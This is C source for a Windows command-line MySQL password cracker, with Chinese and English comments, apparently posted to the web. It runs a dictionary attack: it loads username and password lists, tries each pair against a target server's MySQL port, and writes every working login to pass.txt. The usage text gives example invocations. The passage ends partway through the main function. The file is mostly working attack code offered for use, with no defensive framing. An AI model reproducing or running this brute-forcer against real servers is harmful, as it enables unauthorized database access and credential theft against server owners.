/*程序一:用链表实现的MYSQL密码暴破程序,参考了[email]zhouzhen@gmail.com[/email]的程序,进行了一些修改*/
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include \"F:\pt007\f\database\mysql\mysql_pwd_crack\include\mysql.h\"
#include <stdlib.h>
//链接到WS2_32.LIB库:
#pragma comment(lib, \"Ws2_32.lib\")
#pragma comment(lib, \"libmySQL.lib\")
//定义链表:
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo;
typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo;
void usage(){
printf(\
"mysql password crack v 1.0\n\"); printf(\"\t author:zhouzhen@gmail.com and [email]pt007@vip.sina.com[/email]\n\n\");
fprintf(stdout,\"usage : mysql_pwd_crack [ip] [options]\n\");
printf(\"options:\n\"
\"\t-u username specify the username of mysql\n\"
\"\t-x port specify the port of mysql\n\"
\"\t-p password specify the password of mysql\n\"
\"\t-d dict specify the dictionary\n\"
\"\t-a automode automatic crack the mysql password \n\"
\"\tNote: when u use the -a option, named the username dict user.dic\n\"
\"\t password dict pass.dic\n\"
);
printf(\"\nexample: mysql_pwd_crack 127.0.0.1 -x 3306 -u sql_user.dic -d pass.dic\n\");
printf(\"\t mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.dic\n\");
printf(\"\t mysql_pwd_crack 127.0.0.1 -x 3306 -a\n\");
exit(1);
}
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempPass = NULL;
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL )
{
fprintf(stderr, \"malloc failed %d\", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempPass, 100);
if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)
{
fprintf(stderr, \"malloc failed %d\", GetLastError());
exit(0);
}
memset(s->password, '\0', 100);
fgets(szTempPass, 100, DictFile);
strncpy(s->password, szTempPass, strlen(szTempPass)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempPass);
}
return h;
}
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempName = NULL;
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )
{
fprintf(stderr, \"malloc failed %d\", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempName, 100);
if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)
{
fprintf(stderr, \"malloc failed %d\", GetLastError());
exit(0);
}
memset(s->Name, '\0', 100);
fgets(szTempName, 100, DictFile);
strncpy(s->Name, szTempName, strlen(szTempName)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempName);
}
return h;
}
int LineCount(FILE * fd) //返回字典中的密码数量
{
int countline = 0;
char data[100] = {0};//字符数组清0
while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中
countline++;
rewind(fd);//指针返回到文件起始处
return countline;
}
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd; //检查数据是否可写
ULONG value = 1;
//初使化winsock版本1.1:
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf(\"init failed %d.\n\",WSAGetLastError());
return(0);
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
/* Tell the user that we couldn't find a useable */
/* winsock.dll. */
WSACleanup();
return(0);
}
//创建socket套接字连接:
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf(\"[-] Create socket error %d. \n\",WSAGetLastError());
return(0);
}
//将套接字fd设为非阻塞模式的方法:
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){
printf(\"[-] Gethostbyname(%s) error %d.\n\",address,WSAGetLastError());
return(0);
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;//Ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 5;//以秒为单位指定等待时间
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
recv = select(fd+1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入
if( recv > 0 )
Result = TRUE;
}
closesocket(fd);
WSACleanup();
return Result;
}
int main(int argc, char **argv)
{
MYSQL *sock,mysql;//定义MYSQL结构
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
if( argc != 5) //参数不为5或8个的时候打印帮助
if(argc != 8)
usage();
if (argc == 8)
{
if ( strcmpi(argv[2], \"-x\") )
usage();
if ( strcmpi(argv[4], \"-u\") )
if ( strcmpi(argv[4], \"-p\") )
usage();
if ( !strcmpi(argv[4], \"-u\") )
if ( strcmpi(argv[6], \"-d\") )
usage();
if ( !strcmpi(argv[4], \"-p\") )
if ( strcmpi(argv[6], \"-d\") )
usage();
}
if (argc == 5)
{
if ( strcmpi(argv[2], \"-x\") )
usage();
if ( strcmpi(argv[4], \"-a\") )
usage();
}
/* determinate whether the mysql port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf(\"error:Can't connect to %s:%d\n\", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
mysql_init(&mysql); /* init the mysql */
if ( !strcmpi(argv[4], \"-u\"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], \"r\")) ==NULL){
fprintf(stdout, \"Can't open the password dictionary\n\");
exit(0);
}
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next;
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], \"r\")) ==NULL){
fprintf(stderr, \"Can't open the name dictionary\n\");
exit(0);
}
/*密码最终保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen(\"pass.txt\", \"at+\")) ==NULL){
fprintf(stdout, \"Can't write pass.txt file!\n\");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量
headnode = Create_Name_link(namecount, Namedict); /* create user link */
currnode = headnode->Next;
int j=0,i=1;
while(currnode!=NULL)
{
printf(\"\n开始第%d位用户%s测试:\n\",++j,currnode->Name);
while(curr != NULL)
{
printf(\"Now cracking %s %s \n\", currnode->Name, curr->password);
fflush(NULL);
if ( sock = mysql_real_connect(&mysql, argv[1], currnode->Name, curr->password, \"mysql\", atoi(argv[3]), NULL, 0) )
{
printf(\"%d.Successfully:Mysql server %s's username [%s] password [%s]\n\",j,argv[1],currnode->Name, curr->password);
fseek(passtxt, 0L, SEEK_END);//移动到文件尾部
fprintf(passtxt,\"%d.Successfully:Mysql server %s's username [%s] password [%s]\r\n\",i++,argv[1],currnode->Name, curr->password);
//exit(0);发现一个密码就退出
break;
}
curr = curr->Next;
Sleep(100);
} /* starting crack the mysql password*/
currnode = currnode->Next;
curr = head ->Next;
}
printf(\"\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n\",namecount,passcount);
printf(\"请使用\\"type pass.txt\\"来查看当前目录下的pass.txt文件!\n\");
